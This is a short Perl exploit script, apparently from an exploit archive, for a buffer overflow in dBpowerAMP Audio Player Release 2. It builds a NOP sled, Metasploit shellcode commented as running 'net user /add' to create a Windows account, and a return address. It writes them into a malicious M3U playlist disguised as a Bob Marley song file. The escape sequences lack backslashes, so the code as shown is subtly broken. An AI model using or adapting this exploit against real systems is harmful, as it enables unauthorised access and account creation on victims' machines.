dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit

                                                ####################################################################
#
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit
#
#
#
#
#
#
#
$nop= "x90" x 65;
#
# win32_exec - CMD=cmd /k net user /add secur frog Size=188 http://metasploit.comhttp://metasploit.com 253
#
my $shellcode =
"x29xc9x83xe9xd7xd9xeexd9x74x24xf4x5bx81x73x13x6c".
"x91xfax54x83xebxfcxe2xf4x90x79xbex54x6cx91x71x11".
"x50x1ax86x51x14x90x15xdfx23x89x71x0bx4cx90x11x1d".
"xe7xa5x71x55x82xa0x3axcdxc0x15x3ax20x6bx50x30x59".
"x6dx53x11xa0x57xc5xdex50x19x74x71x0bx48x90x11x32".
"xe7x9dxb1xdfx33x8dxfbxbfxe7x8dx71x55x87x18xa6x70".
"x68x52xcbx94x08x1axbax64xe9x51x82x58xe7xd1xf6xdf".
"x1cx8dx57xdfx04x99x11x5dxe7x11x4ax54x6cx91x71x3c".
"x50xcexcbxa2x0cxc7x73xacxefx51x81x04x04x61x70x50".
"x33xf9x62xaaxe6x9fxadxabx8bxf2x97x30x4cxbex91x74".
"x02xf4x8ex74x19xe2x9fx26x4cxbex9bx30x08xb1x89x31".
"x0fxe4x88x74x0axe3x95x33x6cx91xfax54";
#
$eip = "xe0xecxb8x00";
#
$payload = "http://".$nop.$shellcode.$eip;
#
#
my $file="bob_marley_I_Shot_The_Sheriff.m3u";
#
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $payload;
close($FILE);
print "$file has been created 
";
print "Credits:Securfrog";

# sebug.net